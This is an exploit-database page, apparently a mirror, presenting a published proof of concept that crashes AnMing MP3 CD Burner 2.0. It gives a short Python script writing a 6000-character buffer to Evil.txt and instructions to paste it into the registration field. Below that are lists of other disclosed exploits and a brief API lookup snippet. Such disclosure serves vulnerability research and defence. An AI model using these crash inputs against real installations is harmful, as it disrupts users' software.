Search for hundreds of thousands of exploits

"AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)"

Author

Exploit author

Achilles

Platform

Exploit platform

windows

Release date

Exploit published date

2019-04-25

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Exploit Title: AnMing MP3 CD Burner 2.0 Local Dos Exploit
# Date: 25.04.2019
# Vendor Homepage:http://www.ddz1977.com/
# Software Link:  https://files.downloadnow.com/s/software/10/56/16/74/anming_setup.zip?token=1556228877_063f2dc0aed064ee5d13374d8509661c&fileName=anming_setup.zip
# Exploit Author: Achilles
# Tested Version: 2.0
# Tested on: Windows 7 x64 Sp1
#            Windows XP x86 Sp3


# 1.- Run python code :AnMing.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Anming.exe and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'Your Name and Registration Code'
# 5.- Click 'OK'and you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"
Release DateTitleTypePlatformAuthor
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
Release DateTitleTypePlatformAuthor
2020-05-26"StreamRipper32 2.6 - Buffer Overflow (PoC)"localwindows"Andy Bowden"
2020-05-25"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)"remotewindowsMetasploit
2020-05-25"GoldWave - Buffer Overflow (SEH Unicode)"localwindows"Andy Bowden"
2020-05-22"Filetto 1.0 - 'FEAT' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)"localwindowsGobinathan
2020-05-22"Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation"localwindows"Matteo Malvica"
2020-05-22"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-21"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)"localwindows"Xenofon Vassilakopoulos"
2020-05-21"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)"doswindows"Xenofon Vassilakopoulos"
Release DateTitleTypePlatformAuthor
2019-09-13"Folder Lock 7.7.9 - Denial of Service"doswindowsAchilles
2019-08-19"RAR Password Recovery 1.80 - 'User Name and Registration Code' Denial of Service"doswindowsAchilles
2019-06-20"Tuneclone 2.20 - Local SEH Buffer Overflow"localwindowsAchilles
2019-05-24"Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)"doswindowsAchilles
2019-04-25"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)"localwindowsAchilles
2019-04-25"AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)"doswindowsAchilles
2019-04-22"Ease Audio Converter 5.30 - '.mp4' Denial of Service (PoC)"doswindowsAchilles
2019-03-18"WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service"doswindowsAchilles
2019-03-18"WinMPG Video Convert 9.3.5 - Denial of Service"doswindowsAchilles
2019-02-11"FutureDj Pro 1.7.2.0 - Denial of Service"doswindowsAchilles
2019-02-11"River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH)"localwindowsAchilles
2019-02-05"River Past Audio Converter 7.7.16 - Denial of Service (PoC)"doswindowsAchilles
2019-02-04"MyVideoConverter Pro 3.14 - Denial of Service"doswindowsAchilles
2019-02-01"PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit"localwindowsAchilles
2019-01-02"EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)"doswindows_x86-64Achilles
2018-12-19"PDF Explorer 1.5.66.2 - Buffer Overflow (SEH)"localwindowsAchilles
2018-12-19"PassFab RAR 9.3.2 - Buffer Overflow (SEH)"localwindowsAchilles
2018-12-18"Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service"doswindowsAchilles
2018-12-18"Nsauditor 3.0.28.0 - Local SEH Buffer Overflow"localwindowsAchilles
2018-12-18"MegaPing - Local Buffer Overflow Denial of Service"doswindowsAchilles
2018-12-18"AnyBurn 4.3 - Local Buffer Overflow Denial of Service"doswindowsAchilles
2018-08-03"Wedding Slideshow Studio 1.36 - Buffer Overflow"localwindowsAchilles
2018-07-09"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)"localwindowsAchilles
2018-05-09"Allok Video Splitter 3.1.12.17 - Denial of Service"doswindowsAchilles
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46754/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.